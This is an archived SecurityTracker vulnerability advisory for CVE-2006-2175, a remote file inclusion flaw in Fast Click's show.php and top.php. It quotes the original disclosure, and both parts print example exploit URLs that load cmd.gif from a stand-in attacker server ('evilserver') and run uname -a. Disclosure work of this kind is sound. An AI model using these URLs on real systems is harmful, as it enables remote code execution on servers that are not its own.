Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   


Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker

Category:   Application (Generic)  >   Fast Click Vendors:   FtrainSoft, Inc.
Fast Click Include File Bugs in 'show.php' and 'top.php' Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016021
SecurityTracker URL:
CVE Reference:   CVE-2006-2175   (Links to External Site)
Updated:  Nov 23 2009
Original Entry Date:  May 3 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.3.8 and prior versions
Description:   R@1D3N (amin emami) reported a vulnerability in Fast Click. A remote user can include and execute arbitrary code on the target system.

The 'show.php' and 'top.php' scripts do not properly validate user-supplied input in the 'path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/[path]/show.php?path=http://[attacker]/cmd.gif?&cmd=uname -a
http://[target]/[path]/top.php?path=http://[attacker]/cmd.gif?&cmd=uname -a

The original advisory is available at:

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Date:  Tue, 2 May 2006 12:11:03 -0700 (PDT)
Subject:  Fast Click <= 2.3.8 Remote File Inclusion

Fast Click <= 2.3.8 Remote File Inclusion
------------------------------------------------------- advisory
Bug Discovered by R@1D3N (amin emami) and
original advisory:
Affected software description:
Fast Click <= 2.3.8
Vulnerability: remote file inclusion
The problem exists is in the files "show.php" and "top.php" when include the
variable $Path
Vulnerable Code:

Exploitation example:
http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a
http://[target].com/[path]/top.php?path=http://evilserver/cmd.gif?&cmd=uname -a


* Fix *:
Contact the Vendor

Aria Security Research

Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

Copyright 2015, LLC